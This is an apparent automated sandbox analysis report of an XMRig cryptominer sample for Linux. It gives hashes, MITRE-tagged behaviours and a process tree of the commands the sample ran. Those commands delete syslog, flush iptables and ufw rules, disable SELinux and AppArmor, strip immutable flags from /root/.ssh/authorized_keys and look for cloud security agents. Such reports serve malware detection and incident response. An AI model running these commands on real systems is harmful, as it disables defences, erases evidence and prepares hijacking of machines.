xmrig_linux | e1d7014b84618cd7fbf94439c78fe7d67f351cbc5536885fa3d94ea15325d83b

Analysis

max time kernel
148s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
15-09-2024 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
Size

64KB
MD5

e18e805087ea6f63cf907907dc1d0a08
SHA1

ebe527ca26f78e5d347f22f323ee3f11d58cd57a
SHA256

e1d7014b84618cd7fbf94439c78fe7d67f351cbc5536885fa3d94ea15325d83b
SHA512

92115775959fa27619200334a0add1a448440ae5512aded7bd55937fec1daa0964d54f2e0f881b61515270f5bb783c9d2ab5096fd452529b8af633bff0938784
SSDEEP

768:57kFIBuFkc2zq0xvMGd5QP5ez4Z88mqKWCgpK8d7Cuaxz5st3P/hpE90550RQKIR:KF2Lc2Xnd5QhK8dmtq7b50BIR

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner persistence privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
3412	Process not Found
3426	Process not Found
3461	Process not Found
3586	Process not Found
3419	Process not Found
3433	Process not Found
3475	Process not Found
3454	Process not Found
3482	Process not Found
3406	Process not Found
3440	Process not Found
3447	Process not Found
3468	Process not Found

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Executes dropped EXE 1 IoCs

ioc	pid	Process
/usr/bin/tntrecht	3588	Process not Found

Flushes firewall rules 4 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
1502	ufw
1677	iptables
1717	update-rc.d
3007	Process not Found

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1506	modprobe

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 3 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
3494	Process not Found
3534	Process not Found
1678	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
2599	Process not Found
2603	Process not Found
2913	Process not Found
2973	Process not Found
3413	Process not Found
1518	iptables
1524	iptables
2455	xargs
3486	Process not Found
3519	Process not Found
2583	Process not Found
2896	Process not Found
2909	Process not Found
2056	xargs
2242	xargs
2500	xargs
2096	xargs
2509	xargs
2637	Process not Found
2641	Process not Found
2941	Process not Found
1683	chattr
1808	xargs
1832	xargs
3472	Process not Found
3515	Process not Found
2605	Process not Found
2639	Process not Found
3042	Process not Found
3494	Process not Found
1814	xargs
2339	xargs
2593	Process not Found
2611	Process not Found
2374	xargs
2585	Process not Found
2597	Process not Found
2277	xargs
2415	xargs
2539	xargs
2633	Process not Found
2900	Process not Found
1951	xargs
2036	xargs
2106	xargs
2386	xargs
2531	xargs
2619	Process not Found
2869	Process not Found
1886	xargs
1891	xargs
2138	xargs
1500	chattr
2885	Process not Found
2224	xargs
2470	xargs
2595	Process not Found
2884	Process not Found
2886	Process not Found
1556	iptables
1602	ip6tables
1901	xargs
2897	Process not Found
2969	Process not Found

Disables AppArmor 58 IoCs

Disables AppArmor security module.

pid	Process
1693	systemctl
1718	systemctl
1722	systemctl
1722	systemctl
3011	Process not Found
3011	Process not Found
1718	systemctl
1718	systemctl
1722	systemctl
1693	systemctl
1738	systemctl
2986	Process not Found
2999	Process not Found
3012	Process not Found
3021	Process not Found
1706	systemctl
1713	systemctl
1722	systemctl
2986	Process not Found
3006	Process not Found
3011	Process not Found
3012	Process not Found
1693	systemctl
1718	systemctl
1718	systemctl
1722	systemctl
2986	Process not Found
3006	Process not Found
1713	systemctl
1713	systemctl
2986	Process not Found
1693	systemctl
1718	systemctl
2991	Process not Found
3011	Process not Found
3012	Process not Found
3031	Process not Found
1728	systemctl
1722	systemctl
3023	Process not Found
3012	Process not Found
3012	Process not Found
1713	systemctl
2989	Process not Found
1693	systemctl
1713	systemctl
1693	systemctl
1733	systemctl
2986	Process not Found
3011	Process not Found
3012	Process not Found
1713	systemctl
3006	Process not Found
2986	Process not Found
3006	Process not Found
3006	Process not Found
3011	Process not Found
3006	Process not Found

Disables SELinux 5 IoCs

Disables SELinux security module.

pid	Process
2453	grep
2473	grep
1692	setenforce
2029	grep
2141	grep

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 1 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/bin/tntrecht	Process not Found

Changes its process name 2 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1710
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3003

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/203/cmdline	ps
File opened for reading	/proc/27/status	Process not Found
File opened for reading	/proc/162/status	Process not Found
File opened for reading	/proc/1024/status	ps
File opened for reading	/proc/446/status	ps
File opened for reading	/proc/522/status	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/1081/cmdline	Process not Found
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/1495/status	pgrep
File opened for reading	/proc/1/cmdline	Process not Found
File opened for reading	/proc/169/status	Process not Found
File opened for reading	/proc/158/stat	ps
File opened for reading	/proc/85/cmdline	ps
File opened for reading	/proc/653/cmdline	ps
File opened for reading	/proc/172/status	Process not Found
File opened for reading	/proc/1164/stat	ps
File opened for reading	/proc/958/status	ps
File opened for reading	/proc/35/cmdline	ps
File opened for reading	/proc/447/status	ps
File opened for reading	/proc/1126/stat	ps
File opened for reading	/proc/449/cmdline	Process not Found
File opened for reading	/proc/163/status	Process not Found
File opened for reading	/proc/168/cmdline	Process not Found
File opened for reading	/proc/1282/stat	Process not Found
File opened for reading	/proc/32/status	Process not Found
File opened for reading	/proc/98/status	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/30/cmdline	ps
File opened for reading	/proc/445/cmdline	Process not Found
File opened for reading	/proc/172/cmdline	ps
File opened for reading	/proc/170/status	ps
File opened for reading	/proc/533/cmdline	Process not Found
File opened for reading	/proc/168/status	Process not Found
File opened for reading	/proc/3603/status	Process not Found
File opened for reading	/proc/1139/status	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/1496/cmdline	Process not Found
File opened for reading	/proc/22/status	Process not Found
File opened for reading	/proc/447/cmdline	Process not Found
File opened for reading	/proc/175/cmdline	Process not Found
File opened for reading	/proc/31/cmdline	ps
File opened for reading	/proc/475/stat	ps
File opened for reading	/proc/448/cmdline	ps
File opened for reading	/proc/655/status	Process not Found
File opened for reading	/proc/471/status	Process not Found
File opened for reading	/proc/1081/cmdline	Process not Found
File opened for reading	/proc/162/status	Process not Found
File opened for reading	/proc/35/stat	ps
File opened for reading	/proc/1294/status	ps
File opened for reading	/proc/79/cmdline	ps
File opened for reading	/proc/1114/status	Process not Found
File opened for reading	/proc/2647/cmdline	Process not Found
File opened for reading	/proc/471/cmdline	Process not Found
File opened for reading	/proc/488/stat	ps
File opened for reading	/proc/1338/stat	ps
File opened for reading	/proc/174/stat	ps
File opened for reading	/proc/1122/status	Process not Found
File opened for reading	/proc/4/status	Process not Found
File opened for reading	/proc/85/status	Process not Found
File opened for reading	/proc/177/cmdline	Process not Found
File opened for reading	/proc/25/status	Process not Found

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/svcguard	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/svcworkmanager	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/svcupdates	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/kdevtmpfsi	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/redis2	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/newsvc.sh	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
File opened for modification	/tmp/svcupdate	e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118

/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
1⤵
- Writes DNS configuration
- Writes file to tmp directory
PID:1498
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1499
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:1500
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1501
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1502
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1503
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1504
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1505
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1506
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1510
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1513
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1514
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1515
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1516
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1517
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1518
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1519
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1520
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1521
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1522
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1523
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1524
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1525
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1526
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1539
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1540
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1541
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1542
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1544
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1545
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1554
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1556
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1557
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1568
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1588
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1589
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1595
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1596
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1597
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1598
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1599
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1600
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1601
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1602
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1603
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1604
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1605
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1606
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1607
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1608
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1612
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1616
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1617
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1619
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1620
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1621
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1622
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1623
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1624
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1634
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1649
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1665
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1666
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1669
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1676
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1677
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1678
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:1679
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:1683
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:1684
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1685
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1686
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1687
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1689
- /bin/ps
  ps aux
  2⤵
  PID:1688
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1691
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1690
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:1692
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:1693
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1694
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1695
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    PID:1696
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:1699
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    PID:1698
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
